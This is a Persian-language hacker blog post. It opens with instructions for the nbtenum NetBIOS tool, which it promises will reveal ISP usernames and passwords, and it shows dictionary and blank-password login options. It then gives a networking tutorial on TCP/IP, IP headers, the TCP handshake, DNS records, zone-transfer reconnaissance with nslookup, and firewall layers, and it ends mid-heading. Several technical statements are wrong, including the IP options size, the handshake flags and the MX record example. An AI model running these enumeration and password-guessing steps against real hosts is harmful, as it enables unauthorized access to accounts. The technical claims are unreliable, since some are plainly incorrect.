هکران ایرانی

          به بعد 

                    تو این 

                                وبلاگ 

                                            چیز می نویسم

http:www.hackerirani.blogfa.com

اين يرنامه تحت داس کار ميکنه منظورم داس ويندوز هستش

با اين برنامه ميتونيد تمامه اطلاعات از قبيل user های ISP به همراه پسوردهايشان و

از اينجور چيزا رو دريافت کنيد اين برنامه رو ازانجا بگير

يه برنامه ديگه هم هست که شبيه همينه اينم ميتونی ازانجابگيری

طريقه ی استفاده از اين دو تا برنامه:

اينارو کپی کن تو دايرکتوری windows تو همون درايوی که ويندوزت رو کپی کردی

در ويندوز xp و2000 بايد در دايرکتوری winnt کپی کنيد 

بعد از کپی کردن بايد برويد در داس و انها را اجرا کنيد

کافی است بعد از کپی کردن اين فايل ها در دايکتوری های مخصوص خودشان

داس را بالا آوردi واسمه انها را تايپ کرد

حتما دايکتوری را در داس جايی مناسب بگزاريد

 مثل اين:                                                          C:/>nbtenum -a ip adress

بعدش داس رو بالا ميارين و مينويسين nbtenum مهم نيست تو کدوم درايو

شما فقط بنويس خوب

Usage:
nbtenum [-v
nbtenum [-h
nbtenum [-q] [ip address | ip input file] [username] [password
nbtenum [-a] [ip address | ip input file] [dictionary file
nbtenum [-s] [ip address | ip input file] [dictionary file

خوب بعدش اين مياد

اون دو تای بالا يی مهم نيستن

nbtenum -q ip adress رو بنويسيد اطلاعات سيستم رو ميده

nbtenum -a ip adress  رو بنويسيد يوزر های سيستم  رو ميده ولی بصورت ناشناس

وارد

ميشه

حالا اگه بنويسيد nbtenum-a ip adress keivan ايتجا با نام keivan وارد ميشه و

پسورد رو خالی ميذاره

nbtenum -s ip adress keivan اين هم تقريبا کار a- رو ميکنه و زياد فرق نميکنه

در اينجا يه نکته هستش که آدمو گيج ميکنه

ببينيد :

اين برنامه يه فايل درست ميکنه و اطلاعات رو در اون ميذاره آدرس اين فايل رو

شما بايد تايين کنيد حالا چطوری؟؟؟؟

يه مثال اول ميزنم

C:nbtenum -a ipadress حالا اين برنامه اين فايل رو در درايو c ميذاره

شما اول که تو داس وارد ميشيد اون خودش يه آدرس پيش فرض داره مثل

:D

:C 

و يا غيره که شما بايد خودتون تغييرش بدين

قسمت اول

همانگونه كه انسانها براي ارتباط با يكديگربه زباني (جدا از زبان مادري ) مشترك نياز دارند , كامپيوتر ها نيز به قواعدي ( مستقل از نوع سيستم عامل ) احتياج دارند كه طبق آن قواعد بتوانند با همديگر ارتباط برقرار كنند . در ابتدا مدل OSI مورد قبول سازمان استاندارد جهاني قرار گرفت . در اين مدل وظايف و خدمات شبكه در 7 لايه تعريف شده بود :

7- لايه كاربرد (Application Layer )
6- لايه نمايش ( Presentation Layer )
5- لايه جلسه ( Session Layer)
4- لايه انتقال ( Transport Layer )
3- لايه شبكه ( Network Layer )
2- لايه پيوند داده ها ( Data Link Layer )
1- لايه فيزيكي ( Physical Layer)
در ابتدا گمان ميشد اين مدل بصورت استاندارد فراگير در تمام شبكه ها بكار گرفته شود اما به دلايلي ( از جمله انتشار رايگان برنامه هاي TCP/IP توسط دانشگاه بركلي ) اين مدل پايدار نماند و مدل TCP/IP مورد استفاده قرار گرفت و بصورت استانداردي فراگير براي ارتباط بين كامپيوترها در اينترنت انتخاب شد .
TCP/IP براي ايجاد ارتباط بين كامپيوترها ابتدا اطلاعات ارسالي از سيستم عامل مبدا را طبق استانداردهاي خودش به بسته هايي تبديل كرده و سپس در مقصد اطلاعات دريافتي را مجددا ترجمه كرده به سيستم عامل مقصد تحويل ميدهد . براي اينكار TCP/IP كه مبناي اينترنت است را به 4 لايه تقسيم كرده اند :

4- لايه كاربرد ( Application Layer )
3- لايه لايه انتقال (Transport Layer )
2- لايه شبكه ( Network Layer )
1- لايه واسط شبكه (Network Interface Layer )
لايه اول : واسط شبكه Network interface
در اين لايه استانداردهاي سخت افزاري, نرم افزارهاي راه انداز و پروتكلهاي شبكه تعريف ميشوند .
لايه دوم : شبكه Network Internet
در اين لايه بسته هاي اطلاعاتي ( كه از اين به بعد به آنها بسته هاي IP ميگوييم ) روي شبكه هدايت ميشوند تا به مقصد برسند . مهمترين پروتكلي كه در اين لايه استفاده ميشود پروتكل IP است كه ديتاگرامها (واحدهاي اطلاعاتي كه بايد تحويل مقصد شوند ) را به بسته هاي كوچكتري تبديل ميكند و پس از اضافه كردن اطلاعات لازم براي بازسازي آنها را روي شبكه ارسال ميكند .
لايه سوم : انتقال Transport
اين لايه بر اساس سرويسي كه لايه دوم ارائه ميدهد يك ارتباط مطمئن بين ميزبانها برقرار ميكند . دريافت يا عدم دريافت بسته هاي ارسالي در اين لايه مشخص ميشود. مهمترين پروتكل استفاده شده در اين لايه پروتكل TCP است .
لايه چهارم : كاربرد Application
اين لايه بر اساس خدمات لايه هاي زيرين , سرويس سطح بالايي براي خلق برنامه هاي كاربردي ارائه ميدهد .
لايه اينترنت ( IP ) :
لايه IP يك ديتاگرام را از لايه بالاتر تحويل ميگيرد , اگر طول ديتاگرام بزرگ باشد آنرا به واحدهاي كوچكتر تبديل ميكند و با اضافه كردن اطلاعات لازم آنرا در شبكه به جريان مي اندازد .پروتكل IP مجبور است قبل از ارسال بسته يك شماره شناسايي براي كل بسته و يك شماره ترتيبي براي هر قطعه در نظر بگيرد تا ديتاگرام بتواند در مقصد بازسازي شود .
در كنار پروتكل IP چند پروتكل ديگر مانند ICMP,ARP,RARP,RIP و ... وجود دارند كه در مسيريابي صحيح, مديريت خطاها و به مقصد رسيدن بسته ها به پروتكل IP كمك ميكنند .
بسته هاي IPشامل دو قسمت سرايند و ديتا ميباشند . اطلاعات موجود در سرايند مورد پردازش مسيريابها قرار ميگيرند . اين اطلاعات شامل فيلدهاي زير است :

1- فيلد Version :
4 بيتي است و نسخه IP را مشخص ميكند . اين فيلد شامل عدد 4 يا عدد 6 براي برخي مسيريابهاست.
2- فيلد IHL :
4 بيتي است و طول كل هدر را براساس كلمات 32 بيتي مشخص ميكند .
3- فيلد Type of Service :
8 بيتي است و شامل تقاضاي سرويس ويژه اي براي ارسال ديتا گرام دارد .
4- فيلد Total Length :
16 بيتي است و طول كل بسته شامل هدر و ديتا را مشخص ميكند .
5- فيلد Identification :
16 بيتي است و براي مشخص كردن شماره يك ديتاگرام بكار ميرود.
6- فيلد Fragment Offset :
15 بيتي و شامل دو قسمت است :
Flag :
شامل 2 بيت است يكي براي مشخص كردن قطعه نهايي ديتاگرام(MF) . 1 بودن اين پرچم به اين معناست كه قطعات ديگري نيز براي كامل كردن اين ديتاگرام لازم است و صفر بودن ان به اين معناست كه اين اخرين قطعه ديتاگرام است . بيت ديگر براي مشخص كردن اين نكته است كه ديتاگرام نبايد قطعه قطعه شود (DF) .
Fragment offset :
13 بيتي است و شماره ترتيب قطعه را براي بازسازي ديتاگرام در بر دارد . نكته مهم در اينجا اينست كه اندازه هر قطعه به استثناي قطعه پاياني بايد ضريبي از 8 باشد .
7- فيلد Time To Live :
8 بيتي است و براي مشخص نمودن طول عمر بسته استفاده ميشود . اين فيلد حداكثر ميتواند شامل 255 باشد كه به اين معني است كه 255 مسيرياب را ميتواند طي كند .
8- فيلد Protocol :
8 بيتي است و براي مشخص كردن شماره پروتكل لايه بالاتر براي تجزيه بسته بكار ميرود .
9- فيلد Header Checksum :
16 بيتي و براي كشف خطا .
10- فيلد Source Address :
32 بيتي و براي مشخص كردن IP ادرس فرستنده بكار ميرود .
11- فيلد Destination Address :
32 بيتي و براي مشخص كردن IP ادرس گيرنده بكار ميرود .
12- فيلد Options :
حداكثر 40 بيتي واختياري است .
13- فيلد Payload :
داده هاي دريافتي از لايه بالاتر قرار ميگيرند .
لايه انتقال ( TCP ) :
وظيفه اين لايه فراهم كردن خدماتي سازماندهي شده , مطمئن و مبتني بر اصول سيستم عامل , براي برنامه كاربردي لايه بالاتر است , بگونه اي كه ناكارآمدي لايه اينترنت جبران شود .
هر بسته TCP شامل 6 بيت پرچمه كه هر كدووم از اين بيتها مشخص كننده يه نوع بسته TCP هستند. اين بيتها عبارتند از :
1- بيت URG
2- بيت ACK
3- بيت PSH
4- بيت RST
5- بيت SYN
6- بيت FIN
بيت ACK به معني اينه كه داده هاي فيلد Aknowledgment No. معتبره . ما در اين مرحله از اين بيت در تركيب با ساير بيتها استفاده ميكنيم .
بيت SYN اين بيت هم در تركيب با بيت ACK باعث ايجاد يه ارتباط ميشه .
بيت FIN در انتهاي ارتباط و براي قطع ارتباط براي طرف مقابل ارسال ميشه .
بيت RST قطع يك طرفه ارتباط از طرف صادر كننده اين بيته . در حقيقت پاسخ به بسته هاي سرگردانه كه ما در اين مرحله از اوون نتيجه ميگيريم كه پورت مورد آزمايش بسته است .بيت URG به اين معناست كه داده هاي فيلد Urgent Pointer بايد مورد پردازش قرار بگيره . پردازش داده هاي اين فيلد در لايه كاربرد صورت ميگيره و كاري به مبحث فعلي ما نداره .
و بالاخره بيت PSH كه ست كردن اوون باعث ارسال بسته بطور مستقيم به لايه كاربرد ميشه . و در مواقع ضرورى مثل Telnet بكار ميره .
و فيلدهاي مورد استفاده :
Aknowledgment No. :
اين فيلد شماره ترتيب بايتي كه فرستنده منتظرشه رو تعيين ميكنه .
Sequence No. :
شماره ترتيب آخرين بايت بسته جاري رو در خودش قرار ميده .
براي برقراري ارتباط فرستنده يه بسته بدون اطلاعات رو با تنظيم SYN=1 & ACK=0 و عدد تصادفي x رو در فيلد Sequence No. قرار ميده و به اين وسيله به گيرنده اطلاع ميده كه بسته هاي ارسالي بعدي از طرف فرستنده از شماره x+1 به بعده .
در مرحله دوم گيرنده با دريافت بسته اول در صورت تمايل به قطع ارتباط يه بسته خالي شامل RST=1 بسمت فرستنده ارسال ميكنه و ارتباط قطع ميشه . و در صورت تمايل به بر قراري ارتباط بيتهاي SYN=1 & ACK=1 رو ست ميكنه و مقدار فيلد Aknowledgment No. رو x+1 قرار ميده و عدد تصادفي y رو در Sequence No. قرار ميده . و با اينكار به فرستنده اطلاع ميده كه منتظر ارسال بسته هاي بعدي از شماره x+1 به بعده . و خودش هم اطلاعاتش رو با شماره ترتيب y+1 به بعد براي فرستنده ارسال ميكنه .
و بالاخره فرستنده با تنظيم SYN=1 & ACK=1 و مقداردهي Sequence No.=x+1 وAknowledgment No.=y+1 اعلام ميكنه كه آماده ايجاد ارتباطه .
از اين به بعد تا ارسال بسته شامل بيت خاتمه يعني FIN ارتباط برقراره و دو ماشين بسته هاي خودشون رو با مشخصه هاي گفته شده براي همديگه ارسال ميكنن تا اينكه بسته FIN از سوي يكي از ماشينها ارسال بشه . بعد از ارسال اين بسته ماشين ارسال كننده فقط گيرنده بسته هاي طرف مقابله ( در حقيقت ارتباط يه طرفه ميشه ) تا اينكه طرف دوم هم بسته هاش تمووم بشه و بسته شامل بيت FIN رو ارسال كنه . در اين مرحله هست كه ارتباط بكلي قطع ميشه .

قسمت دوم

آدرسها در اينترنت :
در شبكه كنوني اينترنت تمام كامپيوترهاي متصل به اينترنت داراي يك آدرس 32 بيتي هستند . هر چند تا سال 2005 با فراگير شدن IPng يا IPv6 اين آدرسها 128 بيتي خواخند شد . اين آدرسهاي 32 بيتي چگونه سازماندهي ميشوند ؟
براي سهولت نمايش آدرسها را به 4 قسمت 8 بيتي تقسيم ميكنند كه هر قسمت بين صفر تا 255 است .و بصورت x.y.z.w نمايش ميدهند.
پر ارزشترين بايت , كلاس آدرس را مشخص ميكند . كلاس آدرس مشخص كننده نوع شبكه ماست .
IP آدرس در 5 كلاس A,B,C,D,E تعريف شده اند .
آدرسهاي كلاس A :
قالب 32 بيتي كلاس A بصورت زير است :
آدرس كاربر(24 بيت) آدرس شبكه(7بيت)
هر گاه پرارزشترين بيت IP آدرس صفر باشد , آدرس از كلاس A است . همانگونه كه مشاهده ميكنيد بخش شبكه اين كلاس قادر به ادرس دهي 127 شبكه ميباشد و ميتواند حدود 17000000 كاربر داشته باشد . بنابراين به اين نتيجه ميرسيم كه ادرسهاي كلاس A شبكه هاي ستون فقرات اينترنتي هستند .
آدرسهاي كلاس B :
قالب 32 بيتي كلاس B بصورت زير است :
آدرس كاربر(16 بيت) آدرس شبكه(14بيت) 10
هر گاه پرارزشترين بيتهاي IP آدرس10 باشند , آدرس از كلاس B است . همانگونه كه مشاهده ميكنيد بخش شبكه اين كلاس قادر به ادرس دهي 16382 شبكه ميباشد . كه هر يك ميتواند 65534 كاربر داشته باشد . بنابراين به اين نتيجه ميرسيم كه ادرسهاي كلاس B شبكه هاي عظيم اينترنتي هستند كه تمام اين آدرسها امروز تخصيص داده شده اند .
آدرسهاي كلاس C :
قالب 32 بيتي كلاس C بصورت زير است :
آدرس كاربر(8 بيت) آدرس شبكه(21بيت) 110
در اين كلاس پرارزشترين بيتها 110 هستند . اين كلاس پر كاربردترين كلاس است . در اين كلاس با توجه به آدرس 21 بيتي شبكه , ميتوان حدود 2000000 شبكه تعريف كرد كه هر كدام قادر به سرويس دهي 254 كاربر خواهند بود .
مي توان با توجه به بايت باارزشتر آدرس , كلاس سرور را مشخص كنيد :
1- كلاس A : عدد سمت چپ IP ادرسهاي كلاس A بين 0 تا 127 ميباشد .
2- كلاس B : عدد سمت چپ IP ادرسهاي كلاس B بين 128 تا 191 ميباشد .
3- كلاس C : عدد سمت چپ IP ادرسهاي كلاس C بين 192 تا 223 ميباشد .
آدرسهاي كلاس D :
قالب 32 بيتي كلاس D بصورت زير است :
آدرس كاربر(28 بيت) 1110
در اين كلاس پرارزشترين بيتها 1110هستند . و 28 بيت بعدي براي مقاصد گروهي بكار ميروند .
آدرسهاي كلاس E :
قالب 32 بيتي كلاس E بصورت زير است :
آدرس كاربر(27 بيت) 11110
فعلا اين دسته از آدرسها بدون استفاده اند .
يه سرور DNS دو قسمت داره :
** برنامه DNS :
كه تقاضاي ترجمه نام از كامپيوترهاي ديگه رو قبول ميكنه و پس از پردازش به متقاضي جواب مناسبي ميده .
** بانك اطلاعاتي :
كه داده هاي لازم براي ترجمه را در خودش ذخيره ميكنه .
ما اطلاعاتموونو از اين ركورد بدست مياريم . پس بايد ساختار اوونو بشناسيم .
ساختار اين بانكها در DNS سرورهاي مختلف فرق ميكنه ولي ساختار كلي و عمل اوونها مثل همه . به اين بانك , بانك ركوردهاي منبع ( فايل RR ) هم ميگن . براي افزايش سرعت ترجمه بهتره كه اين فايل بصورت دائم داخل حافظه نهان ( هموون كش ) سرور DNS قرار بگيره . از اوونجا كه تضميني وجود نداره تا IP آدرسِ يه جايي بصورت دائمي يه آدرسِ به خصوصي باشه پس هر ركورد فايل RR يه زمان انقضايي بايد داشته باشه .
ساختار كلي يه ركورد RR به اين صورته :
1- Domain Name
2- Time to live
3- Class
4- Type
5- Value
اينها اطلاعات كلي هستند كه هر ركورد داخل فايل RR داره . ترتيب قرار گرفتن اوونا در سرورهاي مختلف هم متفاوته .
و حالا ببينيم هر كدووم از فيلدهاي RR چي هستن ؟
1- Domain Name :
همينطور كه از اسمش پيداست نام حوزه در اين فيلد نگهداري ميشه . مقدار اين فيلد يكتا نيست چرا كه ممكنه يه كامپيوتر بيش از يه IP آدرس داشته باشه .
2- Time to live :
زمان انقضاي فيلده كه قبلا در موردش توضيح دادم . معمولا در اين فيلد مقدار 86400 ثانيه ( 24 ساعت ) رو قرار ميدن .
3- Class :
براي مشخص كردن ماهيت نام حوزه هست كه در شبكه هاي مختلف فرق ميكنه . در اين فيلد ميتوونه مقادير IN (براي شبكه اينترنت) يا CHAOS و يا HESIOD مربوط به بقيه شبكه ها قرار ميگيره .
از اوونجا كه بحث ما در مورد شبكه اينترنته , در RR هايي كه باهاشوون كار داريم هميشه در فيلد كلاسشوون مقدار IN قرار داره .
4- Type :
نوع ركورد رو مشخص ميكنه .
مهمترين مقاديري كه Type ميتوونه بگيره عبارتند از :
A) SoA ( Start of Authority) :
اطلاعاتي در مورد ناحيه آدرس نمادين , يك شماره سريال , مدير تعريف اسامي و مهلت اعتبار رو مشخص ميكنه . اين ركورد آغاز تمام ركوردهايست كه در يك ناحيه خاص تعريف شدن . براي درك بهتر مطلب مثال زير رو در نظر بگيريد :
Yahoo.com IN SOA Groups.yahoo.com
Root.Yahoo.Groups.com ( 5 ; Serial No.
7200 ; Refresh time ( sec )
3600 ; Retry time ( sec )
151200 ; Expire time ( sec )
86400 ) ; Minimum of time to live ( sec )
توضيح اينكه جملات پس از ; توضيحاتن و جز RR حساب نميشن .
در اين ركورد SOA آغاز تمام ركوردهايست كه در ناحيه Yahoo.com تعريف شده اند . يعني كامپيوترهاي سرور و گيرنده هاي E-mail كه با آدرس ميل ياهو ارسال شده اند و ( ديگر سايتهاي مربوط به ياهو ) در اين حوزه تعريف ميشن .
B ) A ( IP Address) :
معادلي كه در فيلد اول اوومده رو تعيين ميكنه . توضيح اينكه اگر مقدار فيلدي خالي بود , مقدار فيلد سطر قبلي براي اين فيلد هم در نظر گرفته ميشه .
C ) MX ( Mail Exchange ) :
براي ارسال ميلها با آدرسهاي متفاوت به يك آدرس مورد نظر . مثلا فرض كنيد شما دو آدرس پست الكترونيك از دو سرور جدا از هم داشته باشيد و بخواهيد تمام نامه هاي شما به آدرس يكي از آنها ارسال شود بنابراين با استفاده از اين فيلد ميتونيد اين كار رو انجام بديد . مثلا
Hotmail.com 86400 IN MX yahoo.com
باعث ميشه تا تمام نامه هاي ارسالي به آدرس هات ميل شما وارد پست الكترونيكي ياهوي شما شود .
D ) NS ( Name Server ) :
مشخص كننده نام ماشيني است كه قادر است آدرسهاي يك حوزه را تحليل كند . براي درك اين موضوع يه مثال ميزنم :
Microsoft.com 86400 IN NS ns.microsoft.com
Ns.Microsoft.com 86400 IN A x.y.z.w
اين دو ركورد به اين معني اند كه تمام حوزه ها با نامهايي كه به Microsoft.com ختم ميشوند براي مسيريابي و تشخيص IP آدرسشوون بايد در كامپيوتري با IP آدرس x.y.z.w مورد بررسي قرار بگيرند .
E ) CNAME ( Canonical Name ) :
نامهاي مستعار , راحتتر و مشابه براي يك سايت را تعيين ميكنه . مثلا شما بجاي نوشتن www.altavista.com براي سايت آلتاويستا ميتوونيد براحتي فقط www.av.com را تايپ كنيد تا همان سايت آلتاويستا باز شه . اين كار توسط تعريف زير در RR صورت ميگيره :
www.av.com 86400 IN CNAME www.altavista.com


F ) PTR ( Pointer ) :
اين نوع ركورد هم مثل ركورد قبليست فقط بجاي نام حوزه مرجع , IP آدرس اوون قرار ميگيره :
www.av.com IN PTR x.y.z.w


G ) HINFO ( Host Information ) :
اين نوع ركوردها نوع سيستم عامل و كامپيوتر متناظر با اوون نام حوزه را مشخص ميكنه :
www.name.com 86400 IN HINFO SUN UNIX
يعني هاست متناظر با اين سايت داراي سيستم عامل يونيكسه و سخت افزار اوون سازگار با ميني كامپيوترهاي سان هستن .
H ) MINFO ( Mail Information) :
همان نوع قبليه فقط براي مصخص كردن سيستم عامل و نوع كامپيوتر Mail Server مورد نظر بكار ميره .
I ) TXT ( Text ) :
اين نوع ركورد ارزش عملياتي نداره و فقط مشخصاتي از قبيل صاحب شبكه و ... رو تعيين ميكنه .
اينها انواع ركوردهايي بود كه ميتوونه در RR قرار بگيره . حالا ببينيم اين اطلاعات رو از كجا بياريم و چطور ازشوون استفاده كنيم .
براي بدست آوردن بانك اطلاعاتي RR دو راه داريم (مهمه)
تورات سيستم عامل : سيستم عامل هاي Linux و Windows و كلا سيستم هاي مبتني بر Unix و محصولات Microsoft از دستور nslookup استفاده ميكنن ( بقيه سيستم عاملها رو نميدوونم از كدوم دستور استفاده ميكنن , اگه شما ميدونيد لطفا به منم بگين تا ياد بگيرم و اگه خواستين با اسم خودتون تو همين وبلاگ بنويسم ) . البته دستورات Host و Ding هم براي سيستمهاي Unix بكار برده ميشن ولي از نظر من nslookup بهتره . ( هر كسي يه نظري داره ! )
براي استفاده از دستور nslookup , به پنجره Dos در ويندوز يا shell در لينوكس بريد . ( براي اين كار ميتوونيد از كليدهاي Ctrl+Alt+F2 يا هر كليد تابعي ديگه غير از F7 استفاده كنيد تا ترمينال مجازي( Virtual Terminal)براتون باز بشه . در اين پنجره ميتوونيد دستورات Unix رو اجرا كنيد . براي Dos هم كه فكر نكنم كسي مشكل داشته باشه . ) و دستور nslookup رو تايپ كنيد .
حالا شما در محيط nslookup هستيد . اكنون با استفاده از دستور server نام سايت مورد نظر رو تايپ كنيد تا اطلاعات اوون سايت براي استفاده شما آماده بشه . با دستور set type=any شما ميتونيد تمام اطلاعات مربوط به اوون سايت رو درخواست كنيد و با دستور ls -d ( در لينوكس ) ميتوونيد اطلاعات ارسالي از سرور DNS رو ببينيد . كلا بصورت زير عمل كنيد :
$ nslookup
server [نام يا اي پي سرور مورد نظر]
set type = any
ls -d [نام حوزه ]
در Dos هم هموون دستورات بالا قابل اجرا هستند ولي بجاي Ls -d بايد از Dir استفاده كنيد .
2- استفاده ازنرم افزارهايي كه براي همين كار نوشته شده : همونطوري كه گفتم سيستم عامل يونيكس دستورات Host و Ding رو داره كه مشابه nslookup عمل ميكنن . براي ويندوز هم ميتونيد از نرم افزار Ading براي اينكار استفاده كنيد . علاوه بر اين نرم افزارهاي همه منظوره اي هم وجود دارند كه تمام كارهايي رو كه براي شناسايي در اين 4 قسمت گفتم انجام ميدن . نرم افزارهايي مثل :
Sam Spade
iNet Tools
Net Scan Tools
Cyber Kit
علاوه بر تمام نرم افزارها و روشهاي بالا سايتهايي هم هستند كه اين كار رو بصورت رايگان براي شما انجام ميدن . البته مشخص نيست كه اين سايتها تا كي به كارشوون ادامه ميدن چرا كه برخي از اين سايتها به خاطر انجام فعاليتهاي غير مجاز بلوكه ميشن . سايتهايي مثل :
Network tools
Sam spade
Security space
Net tools
Dos help
DSL reports
اما چگونه از نشت اين گونه اطلاعات كه هم مفيدند و هم مضر جلوگيري كنيم ؟(مهمه)

اگه يه يوزر عادي هستيد كه هيچي !!! بايد از يكي خط بگيريد ?كه در مقابل هكرها از شما محافظت كنه !!!
ما اگه مسئول يه شبكه اينترنتي هستيد يا ميتوونيد براي حفاظت شبكه كاري انجام بدين بهتره كارهاي زير رو انجام بدين :
1- اينو مطمئن باشيد كه كمتر كاربري به سيستم عامل و نوع سخت افزار شما توجه داره ( البته هر چه سيستم عامل و سخت افزار شما بهتر باشه , به خاطر سرعت و كيفيت بهتر خط , مشتري بيشتري داريد ولي اوونا به نوع وسائل شما كاري ندارند بلكه بيشتر به امكانات شما توجه ميكنن ) پس چه دليلي داره كه در فيلدهاي متني مثل HINFO يا MINFO يا TXT نوع سخت افزارتوون رو قرار بدين يا نوع سيستم عامل مورد استفادتوون رو ؟ اين اطلاعات بيشتر به درد هكرها ميخوره تا اينكه براي شما تبليغ باشه . اصلا به نظر من بهتره خالي باشن .
2- از انتقال كامل اطلاعات مربوط به يك حوزه ( Zone Transfer ) جلوگيري كنيد . اينم به ياد داشته باشيد كه انتقال كامل اطلاعات مربوط به يك حوزه ( Zone Transfer ) معمولا براي انتقال ركوردها از DNS اوليه به DNS ثانويه براي بروز رساني DNS ثانويه استفاده ميشه و كاربرد ديگه اي براي كسي ( غير هكرها ) نداره .
3- در تكميل نكته دوم , ديوار آتش شبكه رو طوري تنظيم كنيد كه پورت TCP-53 رو مسدود كنه . اين پورت كار انتقال كلي ركوردها رو انجام ميده . چون براي Query هاي DNS از پورت UDP-53 استفاده مشيه بنابراين بستن اين پورت فقط از انتقال كل ركوردها جلوگيري ميكنه و بس .
4- بهتره براي جلوگيري نشت اطلاعات داخلي شبكه از دو تا DNS يكي خارجي و ديگري داخلي استفاده كنيد . با اينكار شما ميتوونيد توسط DNS خارجي حداقل اطلاعات رو در اختيار كاربران خارجي قرار بدين و DNS داخلي هم كل ركوردها و اطلاعات لازم رو براي كاربران داخل شبكه فراهم ميكنه .
سيستمي است بين كاربران يك شبكه محلي و يك شبكه بيروني (مثل اينترنت) كه ضمن نظارت بر بر دسترسي ها , در تمام سطوح ورود و خروج اطلاعات را تحت نظر دارد .
بسته هاي TCP و IP قبل و پس از ورود به شبكه وارد ديوارآتش ميشوند و منتظر مي مانند تا طبق معيارهاي امنيتي خاصي پردازش شوند . حاصل اين پردازش احتمال وقوع سه حالت است :
1- اجازه عبور بسته صادر ميشود (Accept Mode)
2- بسته حذف ميشود (Blocking Mode)
3- بسته حذف ميشود و پيام مناسبي به مبدا ارسال بسته فرستاده ميشود (Response Mode)
همانطور كه همه جا ايست و بازرسي اعصاب خرد كن و وقتگير است ديوار آتش نيز ميتواند بعنوان يك گلوگاه باعث بالا رفتن ترافيك , تاخير, ازدحام و بن بست شود .
از آنجا كه معماري TCP/IP بصورت لايه لايه است (شامل 4 لايه : فيزيكي, شبكه, انتقال و كاربردي ) وهر بسته براي ارسال يا دريافت بايد از هر 4 لايه عبور كند بنابراين بايد براي حفاظت بايد فيلدهاي مربوط شده در هر لايه را مورد بررسي قرار دهيم . بيشترين اهميت در لايه هاي شبكه , انتقال و كاربرد است چون فيلد مربوط به لايه فيزيكي منحصربه فرد نيست و در طول مسير عوض ميشود . پس به يك ديوار آتش چند لايه نياز داريم .

قسمت سوم

سياست امنيتي يك يك شبكه مجموعه اي از قواعد حفاظتي است كه بنابر ماهيت شبكه در يكي از يه لايه ديوار آتش تعريف ميشوند . كارهايي كه در هر لايه از ديوار آتش انجام ميشود عبارتست از :
1- تعيين بسته هاي ممنوع ( سياه ) و حذف آنها يا ارسال آنها به سيستمهاي مخصوص رديابي (لايه اول ديوار آتش)
2- بستن برخي از پورتها متعلق به برخي سرويسها مثلTelnet , FTP و …(لايه دوم ديوار آتش)
3- تحليل يرآيند متن يك صفحه وب يا نامه الكترونيكي يا .... (لايه سوم ديوار آتش)
A - در لايه اول فيلدهاي سرآيند بسته IP مورد تحليل قرار ميگيرد :
** آدرس مبدا( Source Address ) : برخي از ماشينهاي داخل يا خارج شبكه حق ارسال بسته را ندارند , بنابراين بسته هاي آنها به محض ورود به ديوار آتش حذف ميشود .
** آدرس مقصد( Destination Address ) : برخي از ماشينهاي داخل يا خارج شبكه حق دريافت بسته را ندارند , بنابراين بسته هاي آنها به محض ورود به ديوار آتش حذف ميشود .
IP آدرسهاي غيرمجاز و مجاز براي ارسال و دريافت توسط مدير مشخص ميشود .
** شماره شناسايي يك ديتا گرام تكه تكه شده( Id & Fragment Offset ) : بسته هايي كه تكه تكه شده اند يا متعلق به يك ديتا گرام خاص هستند حذف ميشوند .
** زمان حيات بسته : بسته هايي كه بيش ازتعداد مشخصي مسيرياب را طي كرده اند حذف ميشوند.
** بقيه فيلدها بر اساس صلاحديد مدير ديوار آتش قابل بررسي اند .
بهترين خصوصيت لايه اول سادگي و سرعت آن است . چرا كه در اين لايه بسته ها بصورت مستقل از هم بررسي ميشوند و نيازي به بررسي لايه هاي قبلي و بعدي نيست . به همين دليل امروزه مسيريابهايي با قابليت انجام وظايف لايه اول ديوار اتش عرضه شده اند كه با دريافت بسته آنها را غربال كرده به بسته هاي غير مجاز اجازه عبور نميدهند .
با توجه به سرعت اين لايه هر چه قوانين سخت گيرانه تري براي عبور بسته ها از اين لايه وضع شود بسته هاي مشكوك بيشتري حذف ميشوند و حجم پردازش كمتري به لايه هاي بالاتر اعمال ميشود .
B - در لايه دوم فيلدهاي سرآيند لايه انتقال بررسي ميشوند :
** شماره پورت پروسه مبدا و مقصد : با توجه به اين مساله كه شماره پورتهاي استاندارد شناخته شده اند ممكن است مدير ديوار آتش بخواهد بخواهد مثلا سرويس FTP فقط براي كاربران داخل شبكه وجود داشته باشد بنابراين ديوار آتش بسته هاي TCP با شماره پورت 20 و 21 كه قصد ورود يا خروج از شبكه را داشته باشند حذف ميكند . ويا پورت 23 كه مخصوص Telnet است اغلب بسته است . يعني بسته هايي كه پورت مقصدشان 23 است حذف ميشوند .
** كدهاي كنترلي (TCP Code BITS) : ديوار آتش با بررسي اين كدها به ماهيت بسته پي ميبرد و سياستهاي لازم براي حفاظت را اعمال ميكند . مثلا ممكن است ديوار آتش طوري تنظيم شده باشد كه بسته هاي ورودي با SYN=1 را حذف كند . بنابراين هيچارتباط TCP از بيرون به شبكه برقرار نميشود .
**يلد شماره ترتيب و Acknowledgement : بنابر قواعد تعريف شده توسط مدير شبكه قابل بررسي اند .
در اين لايه ديوار آتش با بررسي تقاضاي ارتباط با لايه TCP , تقاضاهاي غير مجاز را حذف ميكند . در اين مرحله ديوار آتش به جدولي از شماره پورتهاي غير مجاز دارد . هر چه قوانين سخت گيرانه تري براي عبور بسته ها از اين لايه وضع شود و پورتهاي بيشتري بسته شوند بسته هاي مشكوك بيشتري حذف ميشوند و حجم پردازش كمتري به لايه سوم اعمال ميشود .
C - در لايه سوم حفاظت بر اساس نوع سرويس و برنامه كاربردي صورت ميگيرد :
در اين لايه براي هر برنامه كاربردي يك سري پردازشهاي مجزا صورت ميگيرد . بنابراين در اين مرحله حجم پردازشها زياد است . مثلا فرض كنيد برخي از اطلاعات پست الكترونيكي شما محرمانه است و شما نگران فاش شدن آنهاييد . در اينجا ديوار آتش به كمك شما مي آيد و برخي آدرسهاي الكترونيكي مشكوك را بلوكه ميكند , در متون نامه ها به دنبال برخي كلمات حساس ميگردد و متون رمزگذاري شده اي كه نتواند ترجمه كند را حذف ميكند .
يا ميخواهيد صفحاتي كه در آنها كلمات كليدي ناخوشايند شما هست را حذف كند و اجازه دريافت اين صفحات به شما يا شبكه شما را ندهد .
همانطور كه متوجه شديد ديوار آتش در هر يه لايه TCP/IP اعمال ميشود ليكن در لايه Network Interface يا اولين لايه اعمال نميشود . اين به اين دليل است كه چون اطلاعات اين به هر شبكه اي كه وارد شد تغيير ميكند , بدرد هكرها نميخورد بنابراين لزومي ندارد كه اين لايه هم حفاظت شود .
انواع ديوارهاي آتش :
A ) ديوارهاي آتش هوشمند :
